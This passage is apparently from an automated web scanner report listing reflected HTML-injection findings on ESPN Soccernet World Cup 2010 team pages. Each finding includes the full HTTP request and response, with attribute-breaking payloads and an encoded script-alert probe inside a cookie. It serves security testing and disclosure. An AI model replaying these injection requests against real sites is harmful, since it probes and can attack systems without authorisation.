GET /worldcup2010/team/_/team/4860/north-korea94792"><a>24dd3ae9355 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:05 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:05 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:05 GMT Content-Length: 81813 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&_slug_=north-korea94792"><a>24dd3ae9355&topId=803573&linktext=North+Korea+coach+proud+of+players"> ...[SNIP]...
2.50. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4860/north-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85746"><a>c9e9c662c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea?85746"><a>c9e9c662c34=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:28:57 GMT Content-Length: 81921 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&85746"><a>c9e9c662c34=1&_slug_=north-korea&85746"> ...[SNIP]...
2.51. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/624/algeria
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced83"><a>be36cbbeb72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeriaced83"><a>be36cbbeb72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:13:10 GMT Content-Length: 81717 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&_slug_=algeriaced83"><a>be36cbbeb72&topId=795940&linktext=Saifi+accused+of+slapping+journalist"> ...[SNIP]...
2.52. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/624/algeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><a>1a4281499ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeria?9d7f4"><a>1a4281499ae=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:12:07 GMT Content-Length: 81825 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&9d7f4"><a>1a4281499ae=1&_slug_=algeria&9d7f4"> ...[SNIP]...
2.53. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/627/japan
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74e2"><a>61cba004527 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japanf74e2"><a>61cba004527 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:24:24 GMT Content-Length: 81475 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&_slug_=japanf74e2"><a>61cba004527&topId=804089&linktext=Japan+search+for+new+boss"> ...[SNIP]...
2.54. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/627/japan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f5b1"><a>ddd77a815e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japan?7f5b1"><a>ddd77a815e5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:15:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:15:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:20:11 GMT Content-Length: 81583 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&7f5b1"><a>ddd77a815e5=1&_slug_=japan&7f5b1"> ...[SNIP]...
2.55. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/628/australia
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c26"><a>970c5e66c8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia91c26"><a>970c5e66c8e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:13:55 GMT Content-Length: 82012 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&_slug_=australia91c26"><a>970c5e66c8e&topId=792986&linktext=Striker+hits+out+over+coach%27s+tactics"> ...[SNIP]...
2.56. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/628/australia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41f3"><a>62eb963c13c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia?f41f3"><a>62eb963c13c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
